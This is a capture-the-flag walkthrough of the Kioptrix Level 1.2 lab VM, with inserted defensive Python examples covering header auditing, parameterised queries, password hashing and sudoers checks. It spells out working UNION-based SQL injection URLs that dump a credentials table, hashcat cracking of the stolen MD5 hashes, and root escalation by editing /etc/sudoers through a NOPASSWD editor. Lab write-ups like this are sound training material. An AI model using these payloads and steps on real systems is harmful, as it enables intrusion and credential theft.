VulnHub - Kioptrix Level 1.2 #3

Let's continue the Kioptrix series with Kioptrix Level 1.2 (#3).

## Objective

The Kioptrix series is aimed at beginners, so the challenges are fairly easy. The objective is to get root access to the VM by any means possible, except by attacking the actual VM client. The purpose of these vulnerable VMs is to learn the basic techniques and tools used in penetration tests. There is more than one way to achieve the objective in this challenge.

The Kioptrix Level 1.1 VM can be downloaded from VulnHub. Note that it is a VMware image and can be used in VMware Workstation or Player. You can convert the image to be compatible with VirtualBox.

## The Hack

The first step in every penetration test is intelligence gathering: passive and active recon and enumeration. Find out which services on the target server are exposed to the world, and which versions they run, so that you can search for known vulnerabilities.

To achieve this we will be using a tool that will become the foundation of your pentesting toolkit: Nmap. The nmap man page explains all the options, flags and arguments usable with nmap.

apb@stratios:~$ nmap -vv --reason -sV -sC -Pn --min-rate=400 -T4 --script-timeout 10m -p-  192.168.163.134

Nmap scan report for 192.168.163.134
Host is up, received user-set (0.00025s latency).
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
| ssh-dss ...
|   2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAyOv6c+5ON+N+ZNDtjetiZ0eUxnIR1U0UqSF+a24Pz2xqdnJC1EN0O3zxGJB3gfPdJlyqUDiozbEth1GBP//8wbWsa1pLJOL1YmcumEJCsitngnrVN7huACG127UjKP8hArECjCHzc1P372gN3AQ/h5aZd0VV17e03HnAJ64ZziOQzVJ+DKWJbiHoXC2cdD1P+nlhK5fULe0QBvmA14gkl2LWA6KILHiisHZpF+V3X7NvXYyCSSI9GeXwhW4RKOCGdGVbjYf7d93K9gj0oU7dHrbdNKgX0WosuhMuXmKleHkIxfyLAILYWrRRj0GVdhZfbI99J3TYaR/yLTpb0D6mhw==
80/tcp open  http    syn-ack Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 99EFC00391F142252888403BB1C196D2
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

# Nmap done at Mon Feb 26 13:58:26 2018 -- 1 IP address (1 host up) scanned in 8.44 seconds

Only ports 22 and 80 are open. Browse to the IP and let's see what is happening on port 80.

They seem to be running LotusCMS. We can look for a version and see if there are known vulnerabilities. There is also a login page; maybe it's vulnerable to SQLi.

Let's quickly run Nikto against the web server and see if it picks up anything.

- Nikto v2.1.6/2.1.5
+ Target Host: 192.168.163.134
+ Target Port: 80
+ GET Cookie PHPSESSID created without the httponly flag
+ GET Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 21:22:00 2009
+ DUOJJMCX Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: TRACE HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: GET /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ GET /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: GET /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
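Several of the Nikto findings above are response-header weaknesses: no anti-clickjacking or anti-sniffing header, a PHPSESSID cookie without HttpOnly, and Server/X-Powered-By headers that disclose versions. The check below is an added example for this write-up, not part of the original post or of Nikto; it audits a list of (name, value) header pairs for exactly those issues and suggests the fix for each. The sample response is constructed to resemble what the scan reported.

```python
"""Audit HTTP response headers for the weaknesses Nikto reported above.
Added example for this write-up, not part of the original post; the sample
response below is constructed to resemble the scan findings."""

# Constructed response headers modelled on the Nikto output on this page.
SAMPLE_HEADERS = [
    ("Server", "Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch"),
    ("X-Powered-By", "PHP/5.2.4-2ubuntu5.6"),
    ("Set-Cookie", "PHPSESSID=constructedsessionid; path=/"),
    ("Content-Type", "text/html"),
]

# Header -> remediation hint.  X-XSS-Protection, which Nikto also lists, is
# deprecated in current browsers and is deliberately not required here.
REQUIRED = {
    "x-frame-options": "add 'X-Frame-Options: DENY' or a frame-ancestors CSP directive",
    "x-content-type-options": "add 'X-Content-Type-Options: nosniff'",
}
VERSION_LEAKS = {
    "server": "set 'ServerTokens Prod' in the Apache config",
    "x-powered-by": "set 'expose_php = Off' in php.ini",
}

def audit_headers(headers):
    """Return a list of findings for a list of (name, value) header pairs."""
    findings = []
    present = {}
    cookies = []
    for name, value in headers:
        lname = name.lower()            # header names are case-insensitive
        if lname == "set-cookie":
            cookies.append(value)       # Set-Cookie may repeat, keep every one
        else:
            present[lname] = value
    for lname, advice in REQUIRED.items():
        if lname not in present:
            findings.append(f"missing {lname}: {advice}")
    for lname, advice in VERSION_LEAKS.items():
        # a digit in the value is a cheap indicator of a version string
        if lname in present and any(ch.isdigit() for ch in present[lname]):
            findings.append(f"{lname} exposes a version string: {advice}")
    for cookie in cookies:
        cname = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(f"cookie {cname} lacks HttpOnly (readable by injected script)")
        if "secure" not in attrs:
            findings.append(f"cookie {cname} lacks Secure (sent over plain HTTP)")
    return findings

if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_HEADERS):
        print(finding)
```

Run against the constructed sample it reports six findings; feed it the headers of a real response (for example from `curl -sI`) and an empty list means the Nikto items above are closed.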

After going through the Nikto results we see they are running phpMyAdmin, a web interface (lazy admins) for managing MySQL databases.

Let's see if we can access phpMyAdmin.

Since we know they are running a CMS and phpMyAdmin, which requires a SQL backend, we can attempt a SQLi.

... and the injection is successful.

Let's snoop around and see what we can find out.

*A couple of minutes later*

After a quick look there doesn’t seem to be anything of value.

Let’s move on to the website / blog that’s running on the host.

On the website's home page they seem to be going on about a new image gallery, so after browsing through a couple of pages within the gallery and using their "sort function", something caught my eye: in the URL, "id=1".

Full url: http://kioptrixtrix3.com/gallery/gallery.php?id=1&sort=dateuploaded#photos

It might be vulnerable to SQLi. Let's find out.

Modify the URL to include a ' after id=1:

http://kioptrixtrix3.com/gallery/gallery.php?id=1'

And we got a SQL error, which means that it is vulnerable to SQLi. If there was no error, then the link would have been safe.

Next we need to figure out how many columns this table has.

We use the same URL to query the database. SQL query:

order by 1 --

Modified URL:

http://kioptrixtrix3.com/gallery/gallery.php?id=1 order by 1 --

If you don't receive an error, carry on incrementing the number in "order by 1" by 1 until you do. When the page with "order by n" errors, the table has n-1 columns.

In this case, you will get an error at

http://kioptrixtrix3.com/gallery/gallery.php?id=1 order by 7 --

So the number of columns is the failing value minus one: 7 - 1 = 6, so this table has 6 columns.

Now that we know there are 6 columns, we need to determine which one is vulnerable.

We will use a "union select" with a sequence of column numbers to find the vulnerable column in the table.

SQL query:

-1 union select 1,2,3,4,5,6  --

Modified URL:

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,2,3,4,5,6 --

Depending on the database, the above might not work, so give the following a try:

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 and 1=2 union select 1,2,3,4,5,6 --

Some of the numbers will be displayed in the page; each one is the position of a column that gets rendered, so they are all less than or equal to the number of columns.

Under "Sub Gallery" it displays 2 and 3. These could be our vulnerable points.

Let's test and confirm.

A simple test would be to see if we can get the database version.

Use the same "union select" sequence and replace the 2 or 3 with "version()" or "@@version":

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,version(),3,4,5,6 --

and

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,2,@@version,4,5,6 --

or both

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,@@version,version(),4,5,6 --

As we can see, it is running MySQL 5.0.51a.

Let's see which database and user the gallery is using.

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,database(),user(),4,5,6 --

Database: gallery User: root

Next we have to find the table names in the database. Replace the 2 or 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()" at the end, before the --.

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database() --

Now we have the tables stored in the database, and dev_accounts looks the most promising.

Let's see if we can find the columns within that table.

We need to make two changes to the statement.

First, replace "group_concat(table_name)" with "group_concat(column_name)".

Then replace "from information_schema.tables where table_schema=database()" with "FROM information_schema.columns WHERE table_name=mysqlchar":

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=mysqlchar

Next we need to convert the table name to a MySQL CHAR() string to replace mysqlchar with.

I used the HackBar add-on for Firefox to achieve this. Once the bar is installed you can go SQL -> MySQL -> MySQL CHAR().

A box will pop up where you enter the table name, and it will convert it to CHAR:

CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)
http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)

Now we have the column names of the dev_accounts table, and we are especially interested in the username and password columns.

Next we try to read the data stored in the username and password columns.

Again, a couple of changes to the SQL statement.

Replace "group_concat(column_name)" with "group_concat(columnname,0x3a,anothercolumnname)" (0x3a is the hex code for a colon, used as a separator between the two values).

Replace "from information_schema.columns where table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)" with "from table_name":

http://kioptrixtrix3.com/gallery/gallery.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5,6 FROM dev_accounts --

... and there we have two usernames with their password hashes.

Let's see if we can crack the passwords.

Put the two hashes in a file.
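Everything from the quote probe to the dev_accounts dump works for one reason: gallery.php pastes the id parameter straight into the SQL text. The example below is added for this write-up and is not the site's real code (which the post never shows). It uses an in-memory SQLite stand-in for the gallery database (schema, rows and the usernames devuser/loneferret are constructed), a lookup that concatenates the parameter the way the vulnerable page evidently does, and a parameterised version. The probes are the ones used above; the UNION payload uses SQLite's || operator in place of MySQL's 0x3a separator.

```python
"""gallery.php flaw and fix, side by side.  Added example for this write-up,
not the site's real code; SQLite stand-in with a constructed schema."""
import sqlite3

def make_db():
    """Constructed sample schema: a six-column gallery table plus dev_accounts."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE gallery (id INTEGER, title TEXT, filename TEXT,
                              dateuploaded TEXT, views INTEGER, owner TEXT);
        INSERT INTO gallery VALUES (1, 'Goats', 'goat1.jpg', '2009-06-05', 10, 'devuser');
        CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
        INSERT INTO dev_accounts VALUES (1, 'devuser', 'CONSTRUCTED_HASH_1');
        INSERT INTO dev_accounts VALUES (2, 'loneferret', 'CONSTRUCTED_HASH_2');
    """)
    return con

def vulnerable_lookup(con, id_param):
    """String concatenation: whatever arrives in ?id= is parsed as SQL."""
    return con.execute("SELECT * FROM gallery WHERE id=" + id_param).fetchall()

def hardened_lookup(con, id_param):
    """Validate, then bind: the parameter is a value, never SQL text.  Rejecting
    non-integers up front turns the database error page into a plain 4xx."""
    if not id_param.lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    return con.execute("SELECT * FROM gallery WHERE id=?", (int(id_param),)).fetchall()

def run_probe(lookup, id_param):
    """Run one probe against a fresh database; return ('rows', rows) or ('error', type)."""
    con = make_db()
    try:
        return ("rows", lookup(con, id_param))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", type(exc).__name__)
    finally:
        con.close()

# The probes from the walkthrough: quote test, column counting, UNION dump.
PROBES = {
    "quote": "1'",
    "order_by_6": "1 order by 6 --",
    "order_by_7": "1 order by 7 --",
    "union": "-1 union select 1,group_concat(username||':'||password),3,4,5,6 from dev_accounts --",
}

if __name__ == "__main__":
    for name, probe in PROBES.items():
        print(name, "vulnerable:", run_probe(vulnerable_lookup, probe))
        print(name, "hardened:  ", run_probe(hardened_lookup, probe))
```

The vulnerable version reproduces the walkthrough: a database error for the lone quote, rows for "order by 6" and an error for "order by 7" (six columns), and the UNION probe returns a row carrying the concatenated dev_accounts credentials. The hardened version never lets any of the probes reach the database, and a legitimate id=1 still returns its gallery row.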

apb@stratios:/tmp$ cat hashes.txt 
0d3eccfb887aabd50f243b3f155c0f85
5badcaf789d3d1d09794d8f021f40f0e

Using hashcat with the rockyou.txt wordlist that comes with Kali (-m 0 selects raw MD5):

apb@stratios:/tmp$ hashcat -m 0 hashes.txt --force /usr/share/wordlists/rockyou.txt

hashcat (v4.0.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-6300U CPU @ 2.40GHz, 1024/2944 MB allocatable, 2MCU

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

Password length minimum: 0
Password length maximum: 256

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

- Device #1: autotuned kernel-accel to 1024
- Device #1: autotuned kernel-loops to 1
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => [s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>
Session..........: hashcat
Status...........: Running
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Tue Feb 27 12:09:20 2018 (0 secs)
Time.Estimated...: Tue Feb 27 12:09:20 2018 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:        0 H/s (0.00ms)
Recovered........: 0/2 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 0/14344385 (0.00%)
Rejected.........: 0/0 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Candidates.#1....: [Copying]
HWMon.Dev.#1.....: N/A

5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Tue Feb 27 12:09:20 2018 (5 secs)
Time.Estimated...: Tue Feb 27 12:09:25 2018 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:  2198.2 kH/s (0.66ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10835968/14344385 (75.54%)
Rejected.........: 0/10835968 (0.00%)
Restore.Point....: 10833920/14344385 (75.53%)
Candidates.#1....: MasterFlick -> MarkBryan98
HWMon.Dev.#1.....: N/A

Started: Tue Feb 27 12:08:52 2018
Stopped: Tue Feb 27 12:09:26 2018

And there are our passwords.

5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
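Both hashes fell in five seconds because dev_accounts stores plain, unsalted MD5 of a dictionary word: one cheap hash per guess, and identical passwords hash identically for every user. The code below is an added example for this write-up, not part of the original post; it confirms the two pairs hashcat recovered above and shows the storage scheme that would have made the leaked table useless to a wordlist attack (random per-user salt plus a slow KDF; the iteration count is an assumption for the example).

```python
"""Why the two dev_accounts hashes fell, and how to store passwords instead.
Added example for this write-up; the hash/password pairs are the ones
hashcat recovered above, the KDF parameters are assumptions."""
import hashlib
import hmac
import os

# Pairs recovered on the page: unsalted MD5 of a dictionary word.
CRACKED = {
    "5badcaf789d3d1d09794d8f021f40f0e": "starwars",
    "0d3eccfb887aabd50f243b3f155c0f85": "Mast3r",
}

def matches_unsalted_md5(hash_hex, candidate):
    """One cheap hash per guess; no salt means a wordlist check is all it takes."""
    return hashlib.md5(candidate.encode()).hexdigest() == hash_hex.lower()

# Hardened storage: a random per-user salt and a deliberately slow KDF.
ITERATIONS = 600_000   # assumed work factor; tune so a check takes ~0.1-0.3 s

def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$iterations$salt_hex$digest_hex' for storage."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        raise ValueError("unknown hash scheme")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)

if __name__ == "__main__":
    for h, p in CRACKED.items():
        print(h, "is md5 of", repr(p), "->", matches_unsalted_md5(h, p))
    stored = hash_password("starwars")
    print("stored form:", stored)
    print("verify correct:", verify_password("starwars", stored))
    print("verify wrong:  ", verify_password("Starwars", stored))
```

Two things to notice when running it: the same password hashed twice gives two different stored strings (the salt differs), so a cracked entry tells you nothing about other users, and each verification costs hundreds of thousands of hash operations instead of one, which is what turns a two-million-guesses-per-second run into a non-starter.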

Now we can try to SSH into the server with the above credentials.

apb@stratios:~$ ssh loneferret@192.168.163.134
loneferret@192.168.163.134's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106

loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README

loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

Let's see what we are allowed to run with sudo.

loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

So we can edit files using this "ht" program. Let's see if we can edit the /etc/sudoers file and give ourselves permission to su to root.

loneferret@Kioptrix3:~$ sudo ht /etc/sudoers

… my. poor. eyes…

anyway..

Press ALT + F to open the File menu and select Open.

Select /etc/sudoers.

Once the file is open, add the following:

loneferret ALL=(ALL) ALL

and remove

loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht

Save and quit the file.

Now try to sudo su -

loneferret@Kioptrix3:~$ sudo su -
root@Kioptrix3:~#

And there we have root access to the target machine.
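The privilege escalation needed no exploit at all: a NOPASSWD rule on an editor that opens any file as root is equivalent to granting root, and the "!/usr/bin/su" entry beside it offers no protection, since the sudoers(5) manual itself warns that "!" negation is not an effective way to restrict commands. The audit below is an added example for this write-up, not part of the original post or of sudo; it parses sudoers-style rules and flags both patterns. The loneferret line is the one shown in the sudo -l output above, the other lines and the list of file-access programs are constructed for the example.

```python
"""Audit sudoers rules for the pattern exploited above: NOPASSWD on a program
that can open arbitrary files as root, plus a '!' deny entry.  Added example
for this write-up, not part of the original post; sample lines constructed."""
import re

# Editors and pagers that can read or write any file when run as root.
# Illustrative set for this example, not an exhaustive list.
FILE_ACCESS_PROGRAMS = {"ht", "vi", "vim", "nano", "emacs", "less", "more"}

SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
www-data ALL=(root) NOPASSWD: /usr/sbin/service apache2 reload
"""

# user  host=(runas) [TAG:] command, command...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)

def audit_sudoers(text):
    """Return (user, command, reason) tuples for rules that hand out root in practice."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, spec = m.group("user"), m.group("spec")
        nopasswd = "NOPASSWD:" in spec
        spec = spec.replace("NOPASSWD:", "").replace("PASSWD:", "")
        for cmd in (c.strip() for c in spec.split(",")):
            if cmd.startswith("!"):
                # sudoers(5): '!' negation is not an effective restriction
                findings.append((user, cmd,
                                 "deny-list entry: sudo negation is bypassable, do not rely on it"))
            elif cmd == "ALL":
                if nopasswd and user != "root":
                    findings.append((user, cmd,
                                     "NOPASSWD ALL: unrestricted root without authentication"))
            else:
                prog = cmd.split()[0].rsplit("/", 1)[-1]
                if prog in FILE_ACCESS_PROGRAMS:
                    findings.append((user, cmd,
                                     f"{prog} can open /etc/sudoers as root: equivalent to full root"))
    return findings

if __name__ == "__main__":
    for user, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {cmd}: {reason}")
```

On the constructed sample it flags exactly the two halves of the loneferret rule and leaves the narrowly scoped www-data service rule alone. The fix the CEO's memo should have prompted is a rule that names a specific, non-interactive command, or no sudo rule at all.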

This one was definitely more challenging than the first two. I had to read up quite a bit for the SQLi queries. But this is how one learns, and you cannot beat the satisfying feeling of solving a problem.
